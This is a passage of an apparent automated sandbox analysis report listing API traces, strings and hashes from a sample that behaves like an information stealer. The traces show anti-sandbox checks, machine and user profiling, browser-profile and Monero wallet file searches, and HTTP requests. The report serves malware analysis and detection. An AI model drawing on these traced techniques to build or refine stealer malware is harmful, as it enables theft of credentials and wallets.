                      Similarity
                      • API ID: ExitProcess
                      • String ID: block

                      Control-flow Graph

                      APIs
                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003E7542
                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003E757F
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003E7603
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E760A
                      • wsprintfA.USER32 ref: 003E7640
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      Similarity
                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                      • String ID: :$C$\$?

                      Control-flow Graph

                      APIs
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,01082230), ref: 003E98A1
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,010822F0), ref: 003E98BA
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,010821B8), ref: 003E98D2
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,01082440), ref: 003E98EA
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,010823E0), ref: 003E9903
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,01088E60), ref: 003E991B
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,01075690), ref: 003E9933
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,010758B0), ref: 003E994C
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,01082248), ref: 003E9964
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,01082290), ref: 003E997C
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,010823F8), ref: 003E9995
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,01082458), ref: 003E99AD
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,010756F0), ref: 003E99C5
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,01082350), ref: 003E99DE
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003D11D0: ExitProcess.KERNEL32 ref: 003D1211
                        • Part of subcall function 003D1160: GetSystemInfo.KERNEL32(?), ref: 003D116A
                        • Part of subcall function 003D1160: ExitProcess.KERNEL32 ref: 003D117E
                        • Part of subcall function 003D1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003D112B
                        • Part of subcall function 003D1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 003D1132
                        • Part of subcall function 003D1110: ExitProcess.KERNEL32 ref: 003D1143
                        • Part of subcall function 003D1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 003D123E
                        • Part of subcall function 003D1220: __aulldiv.LIBCMT ref: 003D1258
                        • Part of subcall function 003D1220: __aulldiv.LIBCMT ref: 003D1266
                        • Part of subcall function 003D1220: ExitProcess.KERNEL32 ref: 003D1294
                        • Part of subcall function 003E6770: GetUserDefaultLangID.KERNEL32 ref: 003E6774
                        • Part of subcall function 003D1190: ExitProcess.KERNEL32 ref: 003D11C6
                        • Part of subcall function 003E7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003D11B7), ref: 003E7880
                        • Part of subcall function 003E7850: RtlAllocateHeap.NTDLL(00000000), ref: 003E7887
                        • Part of subcall function 003E7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003E789F
                        • Part of subcall function 003E78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003E7910
                        • Part of subcall function 003E78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003E7917
                        • Part of subcall function 003E78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003E792F
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01088EE0,?,003F110C,?,00000000,?,003F1110,?,00000000,003F0AEF), ref: 003E6ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003E6AE8
                      • CloseHandle.KERNEL32(00000000), ref: 003E6AF9
                      • Sleep.KERNEL32(00001770), ref: 003E6B04
                      • CloseHandle.KERNEL32(?,00000000,?,01088EE0,?,003F110C,?,00000000,?,003F1110,?,00000000,003F0AEF), ref: 003E6B1A
                      • ExitProcess.KERNEL32 ref: 003E6B22
                      Similarity
                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                      • String ID:

                      Control-flow Graph

                      APIs
                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 003D123E
                      • __aulldiv.LIBCMT ref: 003D1258
                      • __aulldiv.LIBCMT ref: 003D1266
                      • ExitProcess.KERNEL32 ref: 003D1294
                      Similarity
                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                      • String ID: @

                      Control-flow Graph

                      APIs
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01088EE0,?,003F110C,?,00000000,?,003F1110,?,00000000,003F0AEF), ref: 003E6ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003E6AE8
                      • CloseHandle.KERNEL32(00000000), ref: 003E6AF9
                      • Sleep.KERNEL32(00001770), ref: 003E6B04
                      • CloseHandle.KERNEL32(?,00000000,?,01088EE0,?,003F110C,?,00000000,?,003F1110,?,00000000,003F0AEF), ref: 003E6B1A
                      • ExitProcess.KERNEL32 ref: 003E6B22
                      Similarity
                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                      • String ID:

                      Control-flow Graph

                      APIs
                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003D4839
                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 003D4849
                      Similarity
                      • API ID: CrackInternetlstrlen
                      • String ID: <

                      Control-flow Graph

                      APIs
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003D6280: InternetOpenA.WININET(003F0DFE,00000001,00000000,00000000,00000000), ref: 003D62E1
                        • Part of subcall function 003D6280: StrCmpCA.SHLWAPI(?,0108E978), ref: 003D6303
                        • Part of subcall function 003D6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003D6335
                        • Part of subcall function 003D6280: HttpOpenRequestA.WININET(00000000,GET,?,0108E0E8,00000000,00000000,00400100,00000000), ref: 003D6385
                        • Part of subcall function 003D6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003D63BF
                        • Part of subcall function 003D6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003D63D1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003E5228
                      Similarity
                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                      • String ID: ERROR$ERROR
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003E7910
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E7917
                      • GetComputerNameA.KERNEL32(?,00000104), ref: 003E792F
                      Similarity
                      • API ID: Heap$AllocateComputerNameProcess
                      • String ID:
                      APIs
                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003D112B
                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 003D1132
                      • ExitProcess.KERNEL32 ref: 003D1143
                      Similarity
                      • API ID: Process$AllocCurrentExitNumaVirtual
                      • String ID:
                      • API String ID: 1103761159-0
                      • Opcode ID: b6afa398042b8c0b52d999bf2b7478749a3e1a7707e29f55add3a69d9e722b4a
                      • Instruction ID: 926fa99199e6574b1c81e6980e5c7e0be602b956c8d5f93f1b64eb3a38a9975e
                      • Opcode Fuzzy Hash: b6afa398042b8c0b52d999bf2b7478749a3e1a7707e29f55add3a69d9e722b4a
                      • Instruction Fuzzy Hash: 53E0CD7094630CFFE7506BE0EC0EB4C7778EB04B11F109046F7087A2D0C6B426009699
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003D10B3
                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003D10F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Virtual$AllocFree
                      • String ID:
                      • API String ID: 2087232378-0
                      • Opcode ID: 4a239d98c746e4b32be51a93ea34509d53c409bd143e00f87287ed3dccedbb40
                      • Instruction ID: 6a7948d82f9873fba42827663054d8b3811056e7a7cca3b5251d6467538287be
                      • Opcode Fuzzy Hash: 4a239d98c746e4b32be51a93ea34509d53c409bd143e00f87287ed3dccedbb40
                      • Instruction Fuzzy Hash: F3F0E2B2A41218BBE714ABA4AC49FAAB7E8E705B15F305449F504E7380D5719F00CAA0
                      APIs
                        • Part of subcall function 003E78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003E7910
                        • Part of subcall function 003E78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003E7917
                        • Part of subcall function 003E78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003E792F
                        • Part of subcall function 003E7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003D11B7), ref: 003E7880
                        • Part of subcall function 003E7850: RtlAllocateHeap.NTDLL(00000000), ref: 003E7887
                        • Part of subcall function 003E7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003E789F
                      • ExitProcess.KERNEL32 ref: 003D11C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                      • String ID:
                      • API String ID: 3550813701-0
                      • Opcode ID: 3ac4c6333ef17b0d26144d7a52804a8c6a20462735183861134b8e526b4c5688
                      • Instruction ID: 8bae7e1fdc87ac7cc9f24c8ceca891c01ecd7a22c634711c24ceb57deeef1c10
                      • Opcode Fuzzy Hash: 3ac4c6333ef17b0d26144d7a52804a8c6a20462735183861134b8e526b4c5688
                      • Instruction Fuzzy Hash: 6DE012B6D1435163CB0273F2BC0BB6A339E5B54345F08552AFA09D6282FA25F9108566
                      APIs
                      • wsprintfA.USER32 ref: 003E38CC
                      • FindFirstFileA.KERNEL32(?,?), ref: 003E38E3
                      • lstrcat.KERNEL32(?,?), ref: 003E3935
                      • StrCmpCA.SHLWAPI(?,003F0F70), ref: 003E3947
                      • StrCmpCA.SHLWAPI(?,003F0F74), ref: 003E395D
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003E3C67
                      • FindClose.KERNEL32(000000FF), ref: 003E3C7C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                      • API String ID: 1125553467-2524465048
                      • Opcode ID: 21abec51bd794528107fdae2820729390f86c2bd46d59960bdce34647417de89
                      • Instruction ID: 4367c79ded5e04cf19abfad50638ebe732007fb43b022934e60c3699cd0a75fd
                      • Opcode Fuzzy Hash: 21abec51bd794528107fdae2820729390f86c2bd46d59960bdce34647417de89
                      • Instruction Fuzzy Hash: E5A142B1900258ABDB25DFA5DC89FFA7379BF44300F088689F60D96181DB759B84CF52
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • FindFirstFileA.KERNEL32(00000000,?,003F0B32,003F0B2B,00000000,?,?,?,003F13F4,003F0B2A), ref: 003DBEF5
                      • StrCmpCA.SHLWAPI(?,003F13F8), ref: 003DBF4D
                      • StrCmpCA.SHLWAPI(?,003F13FC), ref: 003DBF63
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003DC7BF
                      • FindClose.KERNEL32(000000FF), ref: 003DC7D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                      • API String ID: 3334442632-726946144
                      • Opcode ID: a4c57f67ffda330a2b33a4d817843ed54975b49a23856753315f24dfa2c9f89a
                      • Instruction ID: 7e23074e1039b46c5da9691bb5349328499aeb873efe36fcc5c876c6f35cc660
                      • Opcode Fuzzy Hash: a4c57f67ffda330a2b33a4d817843ed54975b49a23856753315f24dfa2c9f89a
                      • Instruction Fuzzy Hash: BD42B572910158ABDB16FBB1DC96EED733DAF84300F418659F5069A1C1EF30AB49CB92
                      APIs
                      • wsprintfA.USER32 ref: 003E492C
                      • FindFirstFileA.KERNEL32(?,?), ref: 003E4943
                      • StrCmpCA.SHLWAPI(?,003F0FDC), ref: 003E4971
                      • StrCmpCA.SHLWAPI(?,003F0FE0), ref: 003E4987
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003E4B7D
                      • FindClose.KERNEL32(000000FF), ref: 003E4B92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s$%s\%s$%s\*
                      • API String ID: 180737720-445461498
                      • Opcode ID: fbe3c19f2b0e012cec9f5cce30dbca1df3965853d12709fd51eb8e6da5253211
                      • Instruction ID: 1d77faf438e0685dd4be8d4199d6b056444aedc42d232aaaeb039d064bd06164
                      • Opcode Fuzzy Hash: fbe3c19f2b0e012cec9f5cce30dbca1df3965853d12709fd51eb8e6da5253211
                      • Instruction Fuzzy Hash: AA6178B6900218ABCB25EFE4DC45EFA737DBB48700F048689F64996181EB74EB45CF91
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003E4580
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E4587
                      • wsprintfA.USER32 ref: 003E45A6
                      • FindFirstFileA.KERNEL32(?,?), ref: 003E45BD
                      • StrCmpCA.SHLWAPI(?,003F0FC4), ref: 003E45EB
                      • StrCmpCA.SHLWAPI(?,003F0FC8), ref: 003E4601
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003E468B
                      • FindClose.KERNEL32(000000FF), ref: 003E46A0
                      • lstrcat.KERNEL32(?,0108E948), ref: 003E46C5
                      • lstrcat.KERNEL32(?,0108D780), ref: 003E46D8
                      • lstrlen.KERNEL32(?), ref: 003E46E5
                      • lstrlen.KERNEL32(?), ref: 003E46F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                      • String ID: %s\%s$%s\*
                      • API String ID: 671575355-2848263008
                      • Opcode ID: 9ecb2d3474d4ccf665a5e678514913af56c82b393564abdebb842d16388f6402
                      • Instruction ID: dbe1df3d3ea9f4bc76344313730d87e284e8b3ae78fd9109a528d5b927e1f745
                      • Opcode Fuzzy Hash: 9ecb2d3474d4ccf665a5e678514913af56c82b393564abdebb842d16388f6402
                      • Instruction Fuzzy Hash: 8551A8B6900218ABC725EBB0DC89FFD737DAB58300F448689F609961D1EB749B85CF91
                      APIs
                      • wsprintfA.USER32 ref: 003E3EC3
                      • FindFirstFileA.KERNEL32(?,?), ref: 003E3EDA
                      • StrCmpCA.SHLWAPI(?,003F0FAC), ref: 003E3F08
                      • StrCmpCA.SHLWAPI(?,003F0FB0), ref: 003E3F1E
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003E406C
                      • FindClose.KERNEL32(000000FF), ref: 003E4081
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s
                      • API String ID: 180737720-4073750446
                      • Opcode ID: f6996a2a3d2f75f9eaa76160f0900a456afa2fc9ec01855a913c817cb568e4ec
                      • Instruction ID: 0aeed88e7fd10a7472c786fbdca006c994b500844cf1f24674b59ebc98c90aef
                      • Opcode Fuzzy Hash: f6996a2a3d2f75f9eaa76160f0900a456afa2fc9ec01855a913c817cb568e4ec
                      • Instruction Fuzzy Hash: 705199B6900218ABCB25EBF0DC85EFA737DBB44300F048689F25996181DB75EB86CF51
                      APIs
                      • wsprintfA.USER32 ref: 003DED3E
                      • FindFirstFileA.KERNEL32(?,?), ref: 003DED55
                      • StrCmpCA.SHLWAPI(?,003F1538), ref: 003DEDAB
                      • StrCmpCA.SHLWAPI(?,003F153C), ref: 003DEDC1
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003DF2AE
                      • FindClose.KERNEL32(000000FF), ref: 003DF2C3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\*.*
                      • API String ID: 180737720-1013718255
                      • Opcode ID: 25db750e31029aae079c23905112134df111e5903878ed88ff4eb975c95e1e76
                      • Instruction ID: 6ba2f99d0101a7f72cc03260752932d0377754eeff00c41d78eb2e0475f1b2e2
                      • Opcode Fuzzy Hash: 25db750e31029aae079c23905112134df111e5903878ed88ff4eb975c95e1e76
                      • Instruction Fuzzy Hash: 29E176728116689AEB56FB61DC91EEE773DAF50300F414299B40A660D2EF307F8ACF51
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003F15B8,003F0D96), ref: 003DF71E
                      • StrCmpCA.SHLWAPI(?,003F15BC), ref: 003DF76F
                      • StrCmpCA.SHLWAPI(?,003F15C0), ref: 003DF785
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003DFAB1
                      • FindClose.KERNEL32(000000FF), ref: 003DFAC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: prefs.js
                      • API String ID: 3334442632-3783873740
                      • Opcode ID: eb5ba53ab5488c27e1ebf4c837144de1fe1b78134e2824b86c5b6614e48a130a
                      • Instruction ID: 90f96f5bee64513c5e4d0add5ce17a78e872b0875585252b7ff28e55d5f3b098
                      • Opcode Fuzzy Hash: eb5ba53ab5488c27e1ebf4c837144de1fe1b78134e2824b86c5b6614e48a130a
                      • Instruction Fuzzy Hash: 5AB175729006589FDB26FF61DC91BED7779AF54300F0186A9E40A9A1C1EF306B49CF92
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003F510C,?,?,?,003F51B4,?,?,00000000,?,00000000), ref: 003D1923
                      • StrCmpCA.SHLWAPI(?,003F525C), ref: 003D1973
                      • StrCmpCA.SHLWAPI(?,003F5304), ref: 003D1989
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003D1D40
                      • DeleteFileA.KERNEL32(00000000), ref: 003D1DCA
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003D1E20
                      • FindClose.KERNEL32(000000FF), ref: 003D1E32
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 1415058207-1173974218
                      • Opcode ID: 38f3830eeade43c3bed18e9e807b703b86ddac48aa246f55e30181550280088d
                      • Instruction ID: f1e0ae07ac1fb6570374382d782e7114224aac822bed9e24f18bb26a2f23ca4d
                      • Opcode Fuzzy Hash: 38f3830eeade43c3bed18e9e807b703b86ddac48aa246f55e30181550280088d
                      • Instruction Fuzzy Hash: 5E125171910568ABDB16FB61DC96EEE7379AF14300F414299B10A6A0D1EF307F89CFA1
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,003F0C2E), ref: 003DDE5E
                      • StrCmpCA.SHLWAPI(?,003F14C8), ref: 003DDEAE
                      • StrCmpCA.SHLWAPI(?,003F14CC), ref: 003DDEC4
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003DE3E0
                      • FindClose.KERNEL32(000000FF), ref: 003DE3F2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                      • String ID: \*.*
                      • API String ID: 2325840235-1173974218
                      • Opcode ID: 2690b25f4e33c0449b1ef31de7f5a34f856aca71f7c86fc0c77e841a1695f668
                      • Instruction ID: d68bdf087586d44505f9172557ed08751503d0aa610e33fda2146417d78e336e
                      • Opcode Fuzzy Hash: 2690b25f4e33c0449b1ef31de7f5a34f856aca71f7c86fc0c77e841a1695f668
                      • Instruction Fuzzy Hash: 88F1CE718105689ADB27FB61DC95AEE7779AF54300F41429AB00A6A0D1EF307B8ACF61
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003F14B0,003F0C2A), ref: 003DDAEB
                      • StrCmpCA.SHLWAPI(?,003F14B4), ref: 003DDB33
                      • StrCmpCA.SHLWAPI(?,003F14B8), ref: 003DDB49
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003DDDCC
                      • FindClose.KERNEL32(000000FF), ref: 003DDDDE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
                      • Opcode ID: 00ccb7a0233258c4f7f92ada2e15db2db91f8bf3fc49c332e7e77d13af366db1
                      • Instruction ID: 26e6340185947ee64cbad8e92edf18a9ce31be57b5a80c6c15d2dad5c141a113
                      • Opcode Fuzzy Hash: 00ccb7a0233258c4f7f92ada2e15db2db91f8bf3fc49c332e7e77d13af366db1
                      • Instruction Fuzzy Hash: B7918773900118A7DB16FBB1EC969FD777DAF84300F418759F9069A181EE34AB09CB92
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • GetKeyboardLayoutList.USER32(00000000,00000000,003F05AF), ref: 003E7BE1
                      • LocalAlloc.KERNEL32(00000040,?), ref: 003E7BF9
                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 003E7C0D
                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 003E7C62
                      • LocalFree.KERNEL32(00000000), ref: 003E7D22
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                      • String ID: /
                      • API String ID: 3090951853-4001269591
                      • Opcode ID: 43aa595ad9488e148467d0cf245839f8d4775e12f90f502982319a919e2469d4
                      • Instruction ID: 970f10f0abf797c3be424b9574be4c9e9b3e675356c243356ea807f3d056998e
                      • Opcode Fuzzy Hash: 43aa595ad9488e148467d0cf245839f8d4775e12f90f502982319a919e2469d4
                      • Instruction Fuzzy Hash: AC416B71901268ABDB25DB95DC89BEEB7B8FF44700F2042D9E009662C1DB342F85CFA1
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
